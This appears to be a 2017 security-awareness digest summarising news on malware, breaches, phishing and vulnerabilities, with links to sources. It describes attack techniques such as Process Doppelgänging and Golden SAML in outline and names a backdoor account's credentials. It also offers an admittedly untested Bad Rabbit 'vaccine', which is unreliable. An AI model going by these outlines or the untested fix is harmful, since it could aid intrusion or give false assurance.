Simple Doc/Poster if , you want to evangelize 2FA

Get it here
https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201712_en.pdf

From Scammer to Slammer (Talk about insider theft)

Ajay Garg, an assistant programmer at the Central Bureau of Investigation (CBI), has been arrested by his own agency for developing a software that exploits the vulnerabilities of the IRCTC railway ticketing system to book over 1000 Tatkal tickets at a time.

Rather than reporting the vulnerabilities found by him, Garg instead used them for his own gain and amassed a huge wealth by making his software available to travel agents through his accomplice Anil Gupta, who can then easily book Tatkal tickets for clients for a fee using the software.

For More:
http://www.ehackingnews.com/2017/12/tatkal-ticket-scam-uncovered-cbi.html

Watchout - since November 2017 spoofed emails are being sent to unsuspecting users for infecting the computers. These emails are supposed to be sent by commonly used printer and scanner brands.

The emails contain very regular and normal looking subject lines such as Scanned from HO, Scanned from Canon or Scanned from Epson, etc. Cybercrooks have modified extension and file names and hidden the malicious coding in such a way that email antivirus software cannot detect them.

For More
https://www.hackread.com/spoofed-emails-from-printer-vendors-install-backdoor

How to avoid a data breach - Just a few well known ideas which Sr. security folks tend to ignore for various reasons.

This one is sure to repeat more often - Business Email Compromise (BEC) - attacks are when a cyber criminal adopts the identity of a senior executive and sends emails to staff members in an attempt to trick them into doing something that they shouldn’t.

1. Don’t overlook the vulnerability of executives
2. Reduce your data holdings
3. Take a company-wide approach
4. Test yourself on your response plan

For More:
http://www.telegraph.co.uk/connect/better-business/cyber-security/how-to-avoid-a-data-breach/

Android malware that can pose as not a hundred or two but nearly 2,200 banks to steal passwords and carry out fraud

2017 seems to be the year for Andriod Malware - Here is another one "Catelites Android Malware"

The malware can get installed on an android device in more than one ways such as via fake, malicious applications available at third-party app stores or phishing websites. It may also get installed with malicious malware. Catelites can intercept texts, lock the mobile phone, delete device data, access phone numbers, modify speaker volume, spy on message conversations and force password unlocks.

More Here
https://www.hackread.com/catelites-android-malware-poses-as-2200-bank-apps/

I am sure you thought one of these (myths) are TRUE.

Facebook messenger users may want to read this - You might be victimized by a mining bot called Digmine

Facebook Messenger is the launching pad for a new Monero-cryptocurrency mining bot called Digmine

Once downloaded onto a computer, Digmine's first operation is to install an autostart mechanism and launch Chrome with a malicious extension. It then starts mining and finally connects with the Facebook account's friend list via Messenger and begins to spread.

In order to keep the victim unaware, a video file is streamed from a website that is controlled by the cybercriminal and contains additional components for the malware.

For More:
https://www.scmagazine.com/digmine-cryptocurrency-botnet-spreading-through-facebook-messenger/article/720451/

Remember "He who is well prepared has half won the battle" - Are you prepared to deal with "Fileless malware" in 2018

Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year (2017)


Fileless malware attacks, also known as non-malware attacks, allow cybercriminals to skip steps that are needed to deploy malware-based attacks, such as creating payloads with malware to drop onto users' systems. Instead, attackers use trusted programs native to the operating system and native operating system tools like PowerShell and WMI to exploit in-memory access, as well as Web browsers and Office applications

For More:
https://www.darkreading.com/perimeter/fileless-malware-attacks-hit-milestone-in-2017/d/d-id/1330691

Is your Apple iPhone slow - No worries, it is a feature Apple added without bothering to notify users

Apple has finally admitted that it does indeed intentionally slow down older iPhone models


Apple says it is a feature—implemented on the iPhone 6, 6S and SE last year during a software update, and on the iPhone 7 in December with the release of iOS 11.2—to protect against unexpectedly shutting down of older iPhones due to aging batteries and prolong their lifespan.


The above statement by Apple came in response to a blog post published earlier this week by Toronto-based firm Geekbench developer John Poole, who analyzed the performance of iPhone 6S and iPhone 7 over time.

For More
https://thehackernews.com/2017/12/old-iphone-slow.html

300,000 active WordPress sites could have a hidden backdoor. Hope, your site is not one of them. Hope, your site is not one of them.

BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

While reviewing the source code of the Captcha plugin, WordFence folks found a severe backdoor that could allow the plugin author or attackers to remotely gain administrative access to WordPress websites without requiring any authentication.

For More:
https://thehackernews.com/2017/12/wordpress-security-plugin.html

Cyber Threat Intelligence (CTI) - Types and use?

Tactical CTI: 
This form of CTI answers the "what" of a cyber incident and consists largely of bad IP addresses, URLs, file hashes, known malicious domain names, etc.

Operational CTI: 
This form of intelligence analyzes and profiles threat actors and adversaries: the "who" behind the attacks. While still fairly short-term in nature, operational CTI requires human analysis

Strategic CTI: 
Strategic CTI is long-term and takes a geopolitical view that analyzes risk factors such as global events, foreign policy factors, and other local and international movements and agendas that can affect your organization's safety. It is the most difficult type of intelligence to generate


For More:

https://www.darkreading.com/attacks-breaches/comprehensive-endpoint-protection-requires-the-right-cyber-threat-intelligence/a/d-id/1330623

What is the market for stolen passwords?

Just the first seven months of 2017, a botmaster sold approximately 35,000 credential pairs earning him more than $288,000 and almost 9,000 different customers chose to purchase one or more of his username and password pairs.


For More:
https://krebsonsecurity.com/2017/12/the-market-for-stolen-account-credentials/

Thought for the day - Over 92% of the companies that have performed security tests on are vulnerable. And if companies like Facebook, Paypal, Google etc. are vulnerable – why wouldn’t you be?

More Here:
http://arcticstartup.com/how-to-hack-google-learn-from-it/

Free (updated) Memory Forensics Cheat Sheet from SANS

Get it Here
https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf

What more can I say - More than nine in 10 Americans (94%) in a new survey have heard news stories about security breaches but, 43% have not changed their online habits at all.

37% of respondents said they think it’s likely their personal information will be stolen
(it gets better , read below)

However,

1. 43% have not changed their online habits at all.
2. 25% have implemented two-factor authentication
3. 56% of Americans have used a password to lock their computer
4. 45% use a PIN to lock their mobile devices.
5. 19% of Americans reported use of Biometrics

For More:

https://www.infosecurity-magazine.com/news/survey-americans-cyberilliterate?utm_source=twitterfeed&utm_medium=twitter

Are you using Azure AD Connect ? if so, you need to know this

A permissions flaw in Microsoft’s Azure AD Connect software could allow a rogue admin to escalate account privileges and gain unauthorized universal access within a company’s internal network.

The flaw allows trusted users with limited or temporary privileges within a domain, such as the ability to change passwords or add users to administrative groups, to escalate privileges,

Microsoft didn’t release a patch to fix the bug, rather it made available a PowerShell script.

For More:
https://threatpost.com/permissions-flaw-found-azure-ad-connect/129170/

what is wrong with this web page belonging to NatWest Bank

 (Hint - Starts with "Not")

For More:
http://www.bbc.co.uk/news/technology-42353478

Have you enabled MFA for your account? - Because, someone found 1.4 billion usernames and passwords in clear text

The collective database contains plain text credentials leaked from Bitcoin, Pastebin, LinkedIn, MySpace, Netflix, YouPorn, Last.FM, Zoosk, Badoo, RedBox, games like Minecraft and Runescape, and credential lists like Anti Public, Exploit.in.


"None of the passwords are encrypted, and what's scary is that we've tested a subset of these passwords and most of the have been verified to be true," Casal said


For More:
https://thehackernews.com/2017/12/data-breach-password-list.html

ROBOT attack? - Not the Isaac Asimov Kind, its around Encryption

ROBOT - Return of Bleichenbacher’s Oracle Attack

Bleichenbacher’s attack was first discovered in 1998

Studies uncover that probably the most well-known sites on the Internet, including Facebook and Paypal, are influenced by the ROBOT attack.


For More:
http://www.hackersnewsbulletin.com/2017/12/robot-attacks-rediscovered.html

Is it Cayla doll or should we call it Creepy doll?

It turns out that anybody located within nine meters of the toys, outside a building, can wirelessly pair a mobile phone to the toys through Bluetooth, without having to log in. It can be done without inputting a PIN code, and you don’t have to press any kind of button on the toy

Apparently, if you then make a call to the phone that’s sneakily paired with the toy, what you say into the calling phone will be relayed to the toy by the called phone, which effectively gives two-way conversation.


For More:
https://nakedsecurity.sophos.com/2017/12/06/cayla-doll-too-eavesdroppy-to-put-under-the-christmas-tree-says-france/

What the security folks always feared - Memory based Malware (No Files) - Process Doppelgänging (poc)

Process Doppelgänging -  Works on All Windows Versions

Attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.

According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:

1. Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file.
2. Load—create a memory section from the modified (malicious) file.
3. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed.
4.  Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs."

For More:
https://thehackernews.com/2017/12/malware-process-doppelganging.html

Bank Of America, HSBC or TunnelBear customers may want to take a look at this

Researchers from the UK have uncovered a serious vulnerability in the way nine banking and VPN apps handle encrypted communication that puts tens of millions of users at risk of man-in-the-middle (MitM) attacks

"Our tests find that apps from some of the world's largest banks contain the flaw, which if exploited, could enable an attacker to decrypt, view and modify traffic - including log-in credentials - from the users of the app," write Chris Mcmahon Stone, Tom Chothia, and Flavio Garcia of University of Birmingham

For More:
https://www.darkreading.com/mobile/man-in-the-middle-flaw-in-major-banking-vpn-apps-exposes-millions/d/d-id/1330586?_mc

Password Security in a single infographic

BEC - Business Email Compromise - Stats and Solution

Get the infographic from here

https://info.wombatsecurity.com/blog/prevent-business-email-compromise-bec-phishing-attacks?utm_content=63924902&utm_medium=social&utm_source=twitter

5 computer security facts that surprise most people (including some IT Security Folks)

1. Every company is hacked
2. Most companies don’t know the way they are successfully attacked the most
3. A criticality gulf exists between real and perceived threats
4. Firewalls and antivirus software aren’t that important
5. Two problems are almost 100 percent of the risk (unpatched software or a social engineering)

Remember: Most risks can be reduced with the following

• Patch regularly
• Use non-admin / root accounts for regular activities
• Think before you CLICK
• Never give away sensitive information over email or phone (unless you get it from reliable Search engines)

For More:
https://www.csoonline.com/article/3239644/data-breach/5-computer-security-facts-that-surprise-most-people.html#tk.twt_cso

Are you using one of the 33 eMail clients that could be exploited by MailSploit?

German security researcher Sabri Haddouche has discovered a set of vulnerabilities that he collectively refers to as Mailsploit, and which allow an attacker to spoof email identities, and in some cases, run malicious code on the user's computer



The real issue is the email spoofing attack that circumvents all modern anti-spoofing protection mechanisms such as DMARC (DKIM/SPF) or various spam filters.



The full list is given here:
https://docs.google.com/spreadsheets/d/1jkb_ZybbAoUA43K902lL-sB7c1HMQ78-fhQ8nowJCQk/htmlview?sle=true




For More:
https://blog.knowbe4.com/mailsploit-bypasses-dmarc-and-lets-attackers-send-spoofed-phishing-emails-on-over-33-email-clients

Could this be true or is it scaremongering - 100,000-strong botnet built on router 0-day could strike at any time

What sets this latest variant apart is its ability to exploit a recently discovered zeroday vulnerability to infect two widely used lines of home and small-office routers even when they're secured with strong passwords or have remote administration turned off altogether.




More Here:
https://arstechnica.com/information-technology/2017/12/100000-strong-botnet-built-on-router-0-day-could-strike-at-any-time

Malware (called Troubleshooter) can now perform (fake) Tech support functions.

It presents a fake BSOD (Blue Screen of Death) that appears to lock out the user. Then, a “troubleshooting wizard” pops up, masquerading as a Windows utility. It detects “issues” on the PC, and then recommends that the victim pony up $25 via PayPal to buy a package called Windows Defender Essentials to take care of them.

Malwarebytes said that it’s spreading via a cracked software installer that loads various files, including the malware. Troubleshooter then registers itself as a Windows service.

If a victim pays the $25, they are redirected to a “thank you” webpage and the malware is terminated

For More
https://www.infosecurity-magazine.com/news/tech-support-scam-malware-fake?utm_source=twitterfeed&utm_medium=twitter

STATS for RISK based security - IT professionals listed sysadmins as the biggest threat (42%) followed by C-level executives (16%).

While these executives typically have  limited IT skills, their credentials are worth more to hackers than any  other group.

Other targets:

1. Social engineering - HR and finance departments are the easiest targets.
2. Insider risk - IT staff.

For More:
https://www.infosecurity-magazine.com/news/it-staff-blame-themselves-for/

Could you be one of those 40,000 consumer whose sensitive data was exposed (NOT Stolen)

Some 111GB of highly sensitive information including consumer credit histories has been exposed by the National Credit Federation as the result of yet another misconfigured Amazon Web Services (AWS) S3 cloud storage bucket.


Although the leak affected only around 40,000 consumers, the data concerned is highly sensitive, including credit reports from the big three agencies — Equifax, Experian and TransUnion.


What is the most common response by organization- Add additional data/alert feed, Don't spend time filtering/prioritizing them, eventually ignore them (did it resolve the issue?).

More Here
https://www.infosecurity-magazine.com/news/100gb-secret-consumer-credit-data

Remember: To Err is human, blaming it on others is EVEN MORE human.

While 62% of consumers feel businesses are responsible for data security, many have their own poor security hygiene. For instance, 41% fail to take advantage of security measures available to them, such as two-factor authentication for social media accounts. In addition, more than half (56%) still use the same password for multiple online accounts.

“Consumers are evidently happy to relinquish the responsibility of protecting their data to a business, but are expecting it to be kept secure without any effort on their part,”

For More:
https://www.infosecurity-magazine.com/news/consumers-overwhelmingly-blame?utm_source=twitterfeed&utm_medium=twitter

Good news - Firefox to add "Breach Alerts"

Firefox is testing out a warning system that will notify users when they visit breached sites and offer the option to be notified if a site they previously visited becomes breached in the future.

The “Breach Alerts”  will not prevent a user from visiting a site but will give them some soret of idea that the sites security features are less than optimal using data provided by Have I Been Pwned?.

For More:
https://www.scmagazine.com/firefox-browser-tests-notifications-to-alert-users-when-visiting-breached-sites/article/710711/

HP (once a great company, now,) Installs Telemetry software without the user permission and sends data back once a day.

And, HP customers also complained that the installation slowed down their system significantly.


Another user owning an HP laptop head on to Reddit and said:

"So today all of a sudden, I'm experiencing a considerable slowdown in my laptop (Pavilion P3V59PA). Once I look for the problem in Task Manager, I found out that the program called HP Touchpoint Analytics Client (and it's subsequent follow up) constantly jumping the memory usage (~300Mb at a minimum, ~nearly 2Mb at maximum)."

 "I don't remember ever installing this program whatsoever, and in control panel, I found that for some reason this program was silently installed today, without my consent

For More:
https://thehackernews.com/2017/11/hp-computers-telemetry-data.html

Another reason to use MFA (Multi Factor Authentication) -77% of the FTSE 100 were exposed

If they had enabled Multi Factor Authentication (MFA) then , the RISK associated could have been low/Minimal

77% of the FTSE 100 were exposed with an average of 218 usernames and password stolen, published or sold per company.

A significant number of credentials linked to FTSE 100 organisations were still left compromised over the three months following the discovery.


For More:
https://blog.knowbe4.com/77-of-the-ftse-100-have-compromised-credentials-what-is-your-stolen-password-percentage

Crime-as-a-service (CaaS), is among the top five global security threats that businesses will face in 2018.

The rest are

1. the internet of things (IoT)
2. Supply chain risk
3. Regulatory complexity 
4. Unmet board expectations (this one could be the hardest to resolve)

For More:
https://www.infosecurity-magazine.com/news/isf-top-2018-threats

Root access without a password in MacOS?

Sometimes, Fact is stranger than fiction

A new bug in Apple’s operating system MacOS allows anyone to become an admin by entering “root” as login and then pressing enter.

Several information security professionals confirmed to Motherboard that they can reproduce the bug on MacOS 10.13, the latest version of the operating system.


This bug allows any user logged into MacOS to authenticate as root without entering an admin password. And if the Mac has more than one user, this attack works even if the computer is locked.

The bug allows someone to change other users’ passwords since the bug unlocks the system keychain. 

For More:
https://motherboard.vice.com/en_us/article/3kvxg5/apple-mac-bug-root-admin-without-password

Ever Heard of "Golden SAML" - This is a technique for Compromising (SAML based) SSO

The pre-reqs  for this are heavy however,the returns could be great for the hackers


It could allow an attacker to fake enterprise user identities and forge authentication to gain access to valuable cloud resources in a federation environment

“Golden SAML poses serious risk because it allows attackers to fake an identity and forge authentication to any cloud app (Azure, AWS, vSphere, etc.) that supports SAML authentication. Using this post-exploit technique, attackers can become any user they want to be – with the highest level of privileges – and gain approved, federated access to a targeted app,” researchers wrote.

The prerequisites of such attacks, however, are considerable. Among other things, hackers will need the private key that signs the SAML objects, an Active Directory Federation Services user account, token-signing private key, an identity provider (IdP) public certificate and an IdP name.

For More
https://threatpost.com/saml-post-intrusion-attack-mirrors-golden-ticket/128993/

If you are using ZyXEL device and haven't changed the default password , your device might be compromised

An uptick in botnet activity associated with a variant of Mirai. Targeted are ports 23 and 2323 on internet-connected devices made by ZyXEL Communications that are using default credentials.

In October 2016, Mirai malware spread itself to IoT devices gaining access via default password and usernames. The malware then roped affected devices into a botnet and carried out distributed denial of service (DDoS) attacks


For More:
https://threatpost.com/newly-published-exploit-code-used-to-spread-marai-variant/128998/

OWASP Top 10 - 2017 has three new additions

Making its appearance for the first time in OWASP's top 10 list is a category dubbed XML external entities (XXE), pertaining to older and poorly configured XML processors. Data gathered from source code analysis testing tools supported inclusion of XXE as a new vulnerability in the top 10 list, according to OWASP.

The two other new additions to the list are insecure deserialization errors, which enable remote code execution on affected platforms, and insufficient logging and monitoring

PDF version here:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

UBER - Not only did they have a data breach , they also paid ransom to keep it a secret

The $100K Question would be - Did the hackers really delete the data?

Instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data in exchange for keeping the incident secret and deleting the information instead of disclosing the breach, the company paid $100,000 in ransom to the two hackers who had access to the data in exchange for keeping the incident secret and deleting the information


For More:
https://thehackernews.com/2017/11/uber-hack-data-breach.html

Google - We don't need your permission to collect your location information

Google has been caught collecting location data on every Android device owner since the beginning of this year (that's for the past 11 months)—even when location services are entirely disabled.

All it wants is to have your Android device to be connected to the Internet.

Each time your Android device comes within the range of a new cell tower, it gathers the cell tower address and sends this data back to Google when the device is connected to a WiFi network or has a cellular data enabled

For More:
https://thehackernews.com/2017/11/android-location-tracking.html

Black Friday Deals - Here are 6 real phishing emails (that you might receive or already received)

1. Ray-Ban 80% Discount Sale
2. Neuberger Berman Gift Card Perk
3. Free Apple iPhone 6
4. Americanas 60% Laptop Sale
5. Free Preloaded Amazon Gift Card
6. Michael Kors 80% Handbag Sale

For More:
https://www.darkreading.com/mobile/6-real-black-friday-phishing-lures/d/d-id/1330468?image_number=7

SCARY STUFF: Over 400 of the World's Most Popular Websites Record Your "EVERY KEYSTROKE"

Session replay scripts are used by companies to gain insight into how their customers are using their sites and to identify confusing webpages. But the scripts don’t just aggregate general statistics, they record and are capable of playing back individual browsing sessions. The scripts don’t run on every page, but are often placed on pages where users input sensitive information, like passwords and medical conditions. 



Research from Princeton University released last week indicates that online tracking is far more invasive than most users understand

Some highly-trafficked sites run software that records every time you click and every word you type. If you go to a website, begin to fill out a form, and then abandon it, every letter you entered in is still recorded.

For More:
https://motherboard.vice.com/en_us/article/59yexk/princeton-study-session-replay-scripts-tracking-you

Do you have Lolipop, Nougat or Marshmallow (I meant Android OS, NOT those tasty eatables) then you should read this. it seems 77.5% of Android systems at risk.

Since a majority of Android devices nowadays have these three versions of the OS, therefore, around 77.5% of the Android devices are at risk.

The MediaProjection service can be exploited due to a critical flaw. The service is designed to capture user’s screen and record system audio.


Android’s MediaProjection service has existed since long, but apps needed root access and signed up with the release keys of the device in order to use the service
But when Android Lolipop 5.0 was released, Google made this service open to everyone but did not secure it with the requirement of permission from the users

For More
https://www.hackread.com/android-flaw-lets-attacker-capture-screen-record-audio/

(Privacy) Gone with the wind - More than 200 Indian government websites expose citizens' key personal details

The irony is that the Indian government has made it mandatory for every Indian citizen to get their Aadhaar ID to avail of various social welfare schemes and government services

The government also wants all its citizens to link their Aadhaar IDs to their bank accounts, mobile numbers, insurance policies, PAN (Permanent Account Number) and other services.

Aadhaar is currently the world's largest biometric database and has already collected the iris scans and fingerprints of more than a billion Indians. However, many security experts have voiced serious security and privacy concerns over the system, especially due to the fact that it holds billions of users' sensitive and confidential details.


For More:
http://www.ibtimes.co.uk/aadhaar-data-leak-more-200-indian-government-websites-expose-citizens-key-personal-details-1647982

Android Whatsapp users should be aware that when we DELETE a message ,it stays (sounds Strange?)

WhatsApp messages that are deleted are actually still on the device and can be easily accessed


This is according to a report from the Spanish Android blog Android Jefe, which found that deleted WhatsApp messages – at least, the first 100 characters – can be read off of the notification log of the device.

    What we found is that the messages are stored in the notification register of the Android system. So, it’s just a matter of entering that record to see the messages that the other person deleted.

Notification History is a hidden feature that first got added in Android 4.3. Hidden it may be, but there are apps on Google Play that will happily reveal it for you


For More:
https://nakedsecurity.sophos.com/2017/11/16/deleted-whatsapp-sent-messages-might-not-be-gone-forever/

Terdot trojan - once infected you may end up with TearDrop(s)

It can target social media networks  including Facebook, Twitter, Google Plus, and YouTube, and email  service providers including Google's Gmail, Microsoft's live.com, and  Yahoo Mail.

It can also bypass restrictions imposed by TLS (Transport Layer Security) by generating its own Certificate Authority (CA) and generating certificates for every domain the victim visits


For More:
https://thehackernews.com/2017/11/facebook-twitter-hack.html

The cost to change one line of code on a piece of avionics equipment is #1 Million , and it takes a year to implement.

The cost to change one line of code on a piece of avionics equipment is $1 million, and it takes a year to implement. For Southwest Airlines, whose fleet is based on Boeing’s 737, it would “bankrupt” them if a cyber vulnerability was specific to systems on board 737s, he said, adding that other airlines that fly 737s would also see their earnings hurt. Hickey said newer models of 737s and other aircraft, like Boeing’s 787 and the Airbus Group A350, have been designed with security in mind, but that legacy aircraft, which make up more than 90% of the commercial planes in the sky, don’t have these protections.


For More:
http://www.aviationtoday.com/2017/11/08/boeing-757-testing-shows-airplanes-vulnerable-hacking-dhs-says/

Watch out for this banking Malware - ICEDID

The malware listens for the target URL from the list (of financial institutions) and, once it encounters a trigger, executes a designated webinjection. The webinjection sends the victim to a fake bank site set up in advance to match the one originally requested,” researchers wrote.

It performs a smart trick:
To thwart detection by the end user, the malware redirects traffic at the same time keeping the bank’s correct URL in the address bar. That live connection also means the bank’s correct SSL certificate always shows

For More
https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/

GMAIL users - Pay attention!!

Google's study finds that victims of phishing are 400 times more likely to have their account hijacked than a random Google user

Gmail users also represent the largest group of phishing victims, accounting for 27 percent of the total in the study


For More:

https://blog.knowbe4.com/google-our-hunt-for-hackers-reveals-phishing-is-far-deadlier-than-data-breaches

New twist in the Kaspersky story - WikiLeaks Says CIA Impersonated Kaspersky Lab

According to WikiLeaks, its analysis revealed that by using these fake certificates, the CIA made it look like data was being exfiltrated by one of the impersonated entities – in this case Kaspersky Lab.

“We have investigated the claims made in the Vault 8 report published on November 9 and can confirm the certificates in our name are fake,” Kaspersky Lab told SecurityWeek. “Our private keys, services and customers are all safe and unaffected.”

The news that the CIA may have impersonated Kaspersky Lab in its operations has led some to believe that the U.S. may have actually used such tools to falsely pin cyberattacks on Russia.

For More:
http://www.securityweek.com/wikileaks-says-cia-impersonated-kaspersky-lab

Important - Microsoft Security Advisory - for all MS-OFFICE users

Scenario
In an email attack scenario, an attacker could leverage the DDE protocol by sending a specially crafted file to the user and then convincing the user to open the file.

Mitigating DDE Attack Scenarios
Users who wish to take immediate action can protect themselves by manually creating and setting registry entries for Microsoft Office. Use the following instructions to set the registry keys based on the Office applications installed on your system.


For More:
https://technet.microsoft.com/library/security/4053440

Hackers Hacking Hackers - When you use someone else's code , you should know that it could be a trojan.

Vulnerability Scanning script found with Backdoor
Remember, Nothing is free in this world.

1. First, it scans a set of IP addresses to find GoAhead servers vulnerable to a previously disclosed Authentication bypass vulnerability (CVE-2017-8225) in Wireless IP Camera (P2P) WIFI CAM devices.
2. In the background, it secretly creates a backdoor user account (username: VM | password: Meme123) on the wannabe hacker's system, giving the attacker same privilege as root.
3. Script also extracts the IP address of the wannabe hacker, allowing script author to access the compromised systems remotely.
4. Moreover, it also runs another payload on the script kiddie’s system, eventually installing a well-known botnet, dubbed Kaiten.

For More
https://thehackernews.com/2017/11/iot-vulnerability-scanner.html

Did you know that Equifax might have your salary info and selling it for $20

Every payroll period, Facebook, Amazon, Microsoft, and Oracle also provide an electronic feed of their employees’ hourly work and wage information to Equifax. So do Wal-Mart, Twitter, AT&T, Harvard Law School, and the Commonwealth of Pennsylvania. Even Edward Snowden’s former employer, the sometimes secretive N.S.A. contractor Booz Allen Hamilton, sends salary and other personal data about its employees to Equifax Workplace Solutions.

If his new prospective employer is among the 70,000 approved entities in Equifax’s verifier network with a “permissible purpose,” that company can purchase his employment and income information for about $20.

That individual has no control over who picks up the phone, whether the right information is actually given out, or if his or her privacy will be respected.”

In May 2017, Equifax informed some of its customers that unauthorized access to their employee tax records continued, undetected, for nearly a year, between April 17, 2016, and March 29, 2017. These Equifax security lapses occurred in another of TALX’s databases, the Tax Form Management platform, after “crooks were able to reset the 4-digit PIN given to customer employees as a password and then steal W-2 tax data after successfully answering personal questions about those employees,”

For More:
https://www.fastcompany.com/40485634/equifax-salary-data-and-the-work-number-database

Netflix users beware - This is not something that is happening to others. I, had also received this hoax email (a few days back)

According to security firm Mailguard, if recipients click the link in the email, they are directed to a fake Netflix page asking them to login and provide their personal information, including credit card details.


Mailguard offers these tips to help users detect the real source and purpose of an email:

• Always hover your mouse over links within emails and check the domain they're pointing to. If they look suspicious or unfamiliar don't open them
• Cybersecurity threats take many different forms from simple spyware downloads to sophisticated ransomware attacks. Your business can be exposed to a wide variety of different vectors: through peripherals; USB devices; networks; attachments; etc. Security best practice recommends a layered defence strategy to protect users against web threats and malware
• 9 out of 10 cyber-attacks are delivered via email, so it's essential to have the best email filtering in place to protect your systems
• Keep up to date on the latest scams.

For More:
https://finance.yahoo.com/news/hackers-launch-identity-theft-attack-151546094.html

FREE - SANS Cheat Sheet for Incident Response

Get it Here

https://digital-forensics.sans.org/media/EricZimmermanCommandLineToolsCheatSheet-v1.0.pdf

what is SOAR? - Security Orchestration, Automation and Response

Another buzzword to sell new products but, will they really do anything useful?
Probably so, here is an interesting essay from Bruce on the "Orchestration" and "incident response" to understand it better

Data does not equal information, and information does not equal understanding



Data does not equal information, and information does not equal understanding

Uncertainty demands initiative, while certainty demands synchronization

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative.


Automation has its place. If you think about the product categories where it has worked, they’re all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems

For More info:
https://securityintelligence.com/security-orchestration-for-an-uncertain-world/

Just in Time - Shopping(Holiday) Season advise from SANS Security Awareness team.

Get the PDF here:
https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201711_en.pdf

Did you know - AV could be tricked to trust a invalid Cert

Simply copying an authenticode signature from a legitimate file to a known malware sample —  results in an invalid signature — can cause antivirus products to stop detecting it.

"This flaw affects 34 antivirus products, to varying degrees, and malware samples taking advantage of this are also common in the wild,"


More Here
https://www.theregister.co.uk/2017/11/01/digital_cert_abuse/

FREE - Want to know if the website you are visiting is vulnerable , then you should get this Chrome extension

Vulners Web Scanner lets you Scan websites while you surf internet!

Get it here
https://chrome.google.com/webstore/detail/vulners-web-scanner/dgdelbjijbkahooafjfnonijppnffhmd

Good news - Firefox (v58 - Jan 2018) will add a new feature - BLOCK canvas-browser-fingerprinting

Mozilla is testing a new feature in the upcoming version of its Firefox web browser that will grant users the ability to block canvas fingerprinting.


(Canvas fingerprinting is one of a number of browser fingerprinting techniques of tracking online users that allow websites to identify and track visitors using HTML5 canvas element instead of browser cookies or other similar means.)

The permission prompt that Firefox displays reads:

"Will you allow [site] to use your HTML5 canvas image data? This may be used to uniquely identify your computer."


Once you get this message, it's up to you whether you want to allow access to canvas fingerprinting or just block it. You can also check the "always remember my decision" box to remember your choice on future visits as well.

For More:
https://thehackernews.com/2017/10/canvas-browser-fingerprint-blocker.html

Bug in the Bug tracker - I mean the the bug tracking software itself had a bug that kind of messed up google.

Alex Birsan, a software developer and hobbyist bug-hunter, collected more than $15,000 in bounties for finding this bug and two other unrelated flaws in the Issue Tracker. The most critical of the three vulnerabilities allowed him to manipulate a request to the system that would elevate his privileges and provide him access to every detail about a particular vulnerability.


For More:
https://threatpost.com/flaw-in-google-bug-tracker-exposed-reports-about-unpatched-vulnerabilities/128687/

Patch...Patch...Patch is the simplest advise to protect against any Malware - Patch CHROME today

Google is urging users to update their Chrome desktop browsers to avoid security issues related to a high-severity stack-based buffer overflow vulnerability. Google issued the alert Thursday and said an update for most browsers has been released.

Google is not releasing any details surrounding this stack buffer overflow vulnerability (CVE-2017-15396) stating, “access to bug details and links may be kept restricted until a majority of users are updated with a fix.

For More:
https://threatpost.com/google-patches-high-severity-browser-bug/128661/

Android Phone users watchout for DoubleLocker - As you guessed it locks (after encrypting your Android phone) and demands Ransom

The ransomware has been named DoubleLocker because it performs a two-way action to lock the phone, that is, it encrypts all the files and changes the PIN as well so that victims run out of options and give in to the ransom demands of hackers. The ransomware is being distributed as a fake update of Adobe Flash while compromised websites are being used to spread it.

The fake Adobe Flash app requests for Google Play Services activation because it needs to exploit the phone’s accessibility services

It then starts exploiting the permissions by retrieving Windows content, enabling advanced web accessibility for installation of scripts and monitoring the text that the victim types. When permissions are granted, the ransomware is installed as the default Home app. This means when the user will visit Home screen the next time the ransom note will be there.

For more info:
https://www.hackread.com/new-android-ransomware-permanently-changes-pin-demand-ransom/

How to detect malware infection in 9 easy steps with free tools

Hint - If you are SysInternals User then you already know it


Check Here
https://www.csoonline.com/article/2883958/malware/how-to-detect-malware-infection-in-9-easy-steps.html

Is this a temp solution for "Bad Rabbit" Ransomware ?

Performing the following step seems to work like a vaccine , some brave person tested it with a ransomware sample.

(Don't know if it is really works)

===========================
Create the following files
%windir%\infpub.dat
%windir%\cscc.dat
%windir%\infpub.dat
%windir%\dispci.exe

- remove ALL PERMISSIONS (inheritance)
===========================

Have you heard of Windows Defender Exploit Guard (Windows 10 IPS functions)

The four components of Windows Defender Exploit Guard are:

Attack Surface Reduction (ASR): A set of controls that enterprises can enable to prevent malware from getting on the machine by blocking Office-, script-, and email-based threats

Network protection: Protects the endpoint against web-based threats by blocking any outbound process on the device to untrusted hosts/IP through Windows Defender SmartScreen

Controlled folder access: Protects sensitive data from ransomware by blocking untrusted processes from accessing your protected folders

Exploit protection: A set of exploit mitigations (replacing EMET) that can be easily configured to protect your system and applications

More details here:
https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

Did you know that Windows 10 has a feature that could protect your system from ransomware

Microsoft has now introduced Controlled Folder Access feature in its Windows Defender Security Center that is available for Windows 10 Fall Creators Update (v1709)

By enabling Controlled Folder Access (CFA) on a folder, it will be possible to continuously monitor the changes in the system in real-time and timely identify any unauthorized access. In case an unauthorized process attempts to access that folder, which has been protected with CFA, it will immediately be blocked, and the user will be notified


Follow this How-To Document:
https://www.hackread.com/microsoft-windows-10-anti-ransomware/

Mac Owners - If you installed Elmedia Player or download manager Folx the you should read this

